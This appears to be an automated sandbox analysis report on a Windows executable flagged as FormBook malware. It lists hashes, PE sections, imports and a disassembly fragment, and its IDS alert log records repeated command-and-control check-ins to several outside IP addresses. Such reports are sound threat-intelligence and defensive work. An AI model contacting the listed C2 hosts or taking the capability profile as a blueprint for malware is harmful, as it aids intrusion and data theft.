                                                                      Preview:x....YA1A..E...o.GS..~4X..LKYA1AAYWLGZ4OSEGPOLBV7P5XHLKY.1AAWH.IZ.F.d.Q..c._9Fx8>$>3P,a:6")5@o1 g":"b?Ypq..l&6%ToLT]hGZ4OSEG)NE.kW7.e(+.d!V.[...}:S.I..s,%.-...t,,..X")d7+.Z4OSEGPO..V7.4YH....1AAYWLGZ.OQDLQDLB.3P5XHLKYA1!UYWLWZ4O3AGPO.BV'P5XJLK_A1AAYWLAZ4OSEGPO,FV7R5XHLKYC1..YW\GZ$OSEG@OLRV7P5XH\KYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P.,-4?YA1..]WLWZ4O.AGP_LBV7P5XHLKYA1AaYW,GZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5XHLKYA1AAYWLGZ4OSEGPOLBV7P5
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.431355785483816
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:SecuriteInfo.com.FileRepMalware.20173.21714.exe
                                                                      File size:1'362'837 bytes
                                                                      MD5:0f2ea753c03b03eac2e1c52ef6fce533
                                                                      SHA1:49c5baa2bd86b8ac7fa0bd040a7efd76456bc8ba
                                                                      SHA256:1c5d8942e468a007ace85c9e6c063f5931b052eede87f08e4904df083a9d9d15
                                                                      SHA512:ed59851c61de97c208810ae860338c93773993144266c9b64d36de4f2a3775ac9826b3b3f72152f365b7e90bc18e708ecb68237daa06b4b1fceeafc35cfbe4f7
                                                                      SSDEEP:24576:pRmJkcoQricOIQxiZY1iaaj7pJGxXUAVeVg7TqWDW1qxJuzz:mJZoQrbTFZY1iai7pJyXNeV0qWP8X
                                                                      TLSH:5555E121F5C68075C5A327B14E7EF765963D6D2A0336D19B33C83E366EB11422B2A723
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                      Icon Hash:0fd88dc89ea7861b
                                                                      Entrypoint:0x4165c1
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                      Instruction
                                                                      call 00007F65BC7C350Bh
                                                                      jmp 00007F65BC7BA37Eh
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      push edi
                                                                      push esi
                                                                      mov esi, dword ptr [ebp+0Ch]
                                                                      mov ecx, dword ptr [ebp+10h]
                                                                      mov edi, dword ptr [ebp+08h]
                                                                      mov eax, ecx
                                                                      mov edx, ecx
                                                                      add eax, esi
                                                                      cmp edi, esi
                                                                      jbe 00007F65BC7BA4FAh
                                                                      cmp edi, eax
                                                                      jc 00007F65BC7BA696h
                                                                      cmp ecx, 00000080h
                                                                      jc 00007F65BC7BA50Eh
                                                                      cmp dword ptr [004A9724h], 00000000h
                                                                      je 00007F65BC7BA505h
                                                                      push edi
                                                                      push esi
                                                                      and edi, 0Fh
                                                                      and esi, 0Fh
                                                                      cmp edi, esi
                                                                      pop esi
                                                                      pop edi
                                                                      jne 00007F65BC7BA4F7h
                                                                      jmp 00007F65BC7BA8D2h
                                                                      test edi, 00000003h
                                                                      jne 00007F65BC7BA506h
                                                                      shr ecx, 02h
                                                                      and edx, 03h
                                                                      cmp ecx, 08h
                                                                      jc 00007F65BC7BA51Bh
                                                                      rep movsd
                                                                      jmp dword ptr [00416740h+edx*4]
                                                                      mov eax, edi
                                                                      mov edx, 00000003h
                                                                      sub ecx, 04h
                                                                      jc 00007F65BC7BA4FEh
                                                                      and eax, 03h
                                                                      add ecx, eax
                                                                      jmp dword ptr [00416654h+eax*4]
                                                                      jmp dword ptr [00416750h+ecx*4]
                                                                      nop
                                                                      jmp dword ptr [004166D4h+ecx*4]
                                                                      nop
                                                                      inc cx
                                                                      add byte ptr [eax-4BFFBE9Ah], dl
                                                                      inc cx
                                                                      add byte ptr [ebx], ah
                                                                      ror dword ptr [edx-75F877FAh], 1
                                                                      inc esi
                                                                      add dword ptr [eax+468A0147h], ecx
                                                                      add al, cl
                                                                      jmp 00007F65BEC32CF7h
                                                                      add esi, 03h
                                                                      add edi, 03h
                                                                      cmp ecx, 08h
                                                                      jc 00007F65BC7BA4BEh
                                                                      rep movsd
                                                                      jmp dword ptr [00000000h+edx*4]
                                                                      Programming Language:
                                                                      • [ C ] VS2010 SP1 build 40219
                                                                      • [C++] VS2010 SP1 build 40219
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [ASM] VS2010 SP1 build 40219
                                                                      • [RES] VS2010 SP1 build 40219
                                                                      • [LNK] VS2010 SP1 build 40219
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x13778.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0xab0000x137780x138002ac39c9ceeb6104c0860a528ca24cba0False0.16701722756410256data4.016130089132254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0xab4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                      RT_ICON0xab5700x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                      RT_ICON0xab6980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                      RT_ICON0xab7c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/mEnglishGreat Britain0.14468236129184905
                                                                      RT_MENU0xbbfe80x50dataEnglishGreat Britain0.9
                                                                      RT_DIALOG0xbc0380xfcdataEnglishGreat Britain0.6507936507936508
                                                                      RT_STRING0xbc1380x530dataEnglishGreat Britain0.33960843373493976
                                                                      RT_STRING0xbc6680x690dataEnglishGreat Britain0.26964285714285713
                                                                      RT_STRING0xbccf80x4d0dataEnglishGreat Britain0.36363636363636365
                                                                      RT_STRING0xbd1c80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                      RT_STRING0xbd7c80x65cdataEnglishGreat Britain0.34336609336609336
                                                                      RT_STRING0xbde280x388dataEnglishGreat Britain0.377212389380531
                                                                      RT_STRING0xbe1b00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                      RT_GROUP_ICON0xbe3080x14dataEnglishGreat Britain1.25
                                                                      RT_GROUP_ICON0xbe3200x14dataEnglishGreat Britain1.15
                                                                      RT_GROUP_ICON0xbe3380x14dataEnglishGreat Britain1.25
                                                                      RT_GROUP_ICON0xbe3500x14dataEnglishGreat Britain1.25
                                                                      RT_VERSION0xbe3680x19cdataEnglishGreat Britain0.5339805825242718
                                                                      RT_MANIFEST0xbe5080x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                      DLLImport
                                                                      WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                      VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                      COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                      MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                      PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                      USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                      KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                      USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                      GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                      ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                      ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                      OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishGreat Britain
                                                                      EnglishUnited States
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-06T05:21:13.406542+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.649747TCP
                                                                      2024-11-06T05:21:49.647859+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6499443.33.130.19080TCP
                                                                      2024-11-06T05:21:49.647859+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499443.33.130.19080TCP
                                                                      2024-11-06T05:21:51.288076+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.649957TCP
                                                                      2024-11-06T05:22:13.423230+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499853.33.130.19080TCP
                                                                      2024-11-06T05:22:16.034847+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499873.33.130.19080TCP
                                                                      2024-11-06T05:22:18.518579+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499883.33.130.19080TCP
                                                                      2024-11-06T05:22:21.140922+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6499893.33.130.19080TCP
                                                                      2024-11-06T05:22:21.140922+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499893.33.130.19080TCP
                                                                      2024-11-06T05:22:27.479694+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999038.88.82.5680TCP
                                                                      2024-11-06T05:22:30.016357+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999138.88.82.5680TCP
                                                                      2024-11-06T05:22:32.586085+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999238.88.82.5680TCP
                                                                      2024-11-06T05:22:35.108053+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64999338.88.82.5680TCP
                                                                      2024-11-06T05:22:35.108053+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64999338.88.82.5680TCP
                                                                      2024-11-06T05:22:40.818273+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499943.33.130.19080TCP
                                                                      2024-11-06T05:22:43.502678+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499953.33.130.19080TCP
                                                                      2024-11-06T05:22:46.016907+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499963.33.130.19080TCP
                                                                      2024-11-06T05:22:49.500133+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6499983.33.130.19080TCP
                                                                      2024-11-06T05:22:49.500133+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499983.33.130.19080TCP
                                                                      2024-11-06T05:22:55.184715+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499993.33.130.19080TCP
                                                                      2024-11-06T05:22:57.782676+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500003.33.130.19080TCP
                                                                      2024-11-06T05:23:00.285861+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500013.33.130.19080TCP
                                                                      2024-11-06T05:23:02.816885+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500023.33.130.19080TCP
                                                                      2024-11-06T05:23:02.816885+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500023.33.130.19080TCP
                                                                      2024-11-06T05:23:08.570890+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000367.223.117.14280TCP
                                                                      2024-11-06T05:23:11.120389+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000467.223.117.14280TCP
                                                                      2024-11-06T05:23:13.667887+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000567.223.117.14280TCP
                                                                      2024-11-06T05:23:16.216401+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65000667.223.117.14280TCP
                                                                      2024-11-06T05:23:16.216401+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65000667.223.117.14280TCP
                                                                      2024-11-06T05:23:22.158199+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650007178.79.184.19680TCP
                                                                      2024-11-06T05:23:24.728373+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650008178.79.184.19680TCP
                                                                      2024-11-06T05:23:27.281422+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650009178.79.184.19680TCP
                                                                      2024-11-06T05:23:29.790674+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650010178.79.184.19680TCP
                                                                      2024-11-06T05:23:29.790674+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650010178.79.184.19680TCP
                                                                      2024-11-06T05:23:44.092129+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650011185.179.189.19380TCP
                                                                      2024-11-06T05:23:46.664593+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650013185.179.189.19380TCP
                                                                      2024-11-06T05:23:49.124451+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650014185.179.189.19380TCP
                                                                      2024-11-06T05:23:51.677592+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650015185.179.189.19380TCP
                                                                      2024-11-06T05:23:51.677592+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650015185.179.189.19380TCP
                                                                      2024-11-06T05:23:58.099794+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001652.20.84.6280TCP
                                                                      2024-11-06T05:24:00.644844+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001752.20.84.6280TCP
                                                                      2024-11-06T05:24:03.188852+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001852.20.84.6280TCP
                                                                      2024-11-06T05:24:05.725076+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65001952.20.84.6280TCP
                                                                      2024-11-06T05:24:05.725076+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65001952.20.84.6280TCP
                                                                      2024-11-06T05:24:11.472867+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500203.33.130.19080TCP
                                                                      2024-11-06T05:24:13.970701+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500213.33.130.19080TCP
                                                                      2024-11-06T05:24:16.495564+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500223.33.130.19080TCP
                                                                      2024-11-06T05:24:19.039876+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500233.33.130.19080TCP
                                                                      2024-11-06T05:24:19.039876+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500233.33.130.19080TCP
                                                                      2024-11-06T05:24:25.633559+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500243.33.130.19080TCP
                                                                      2024-11-06T05:24:27.355632+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500253.33.130.19080TCP
                                                                      2024-11-06T05:24:29.866494+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500263.33.130.19080TCP
                                                                      2024-11-06T05:24:32.392496+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500273.33.130.19080TCP
                                                                      2024-11-06T05:24:32.392496+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500273.33.130.19080TCP
                                                                      2024-11-06T05:24:38.764285+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650028162.241.85.9480TCP
                                                                      2024-11-06T05:24:41.248340+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650029162.241.85.9480TCP
                                                                      2024-11-06T05:24:43.854465+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650030162.241.85.9480TCP
                                                                      2024-11-06T05:24:46.326045+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650031162.241.85.9480TCP
                                                                      2024-11-06T05:24:46.326045+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650031162.241.85.9480TCP
                                                                      2024-11-06T05:24:52.100209+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500323.33.130.19080TCP
                                                                      2024-11-06T05:24:54.582791+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500333.33.130.19080TCP
                                                                      2024-11-06T05:24:58.056725+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6500343.33.130.19080TCP
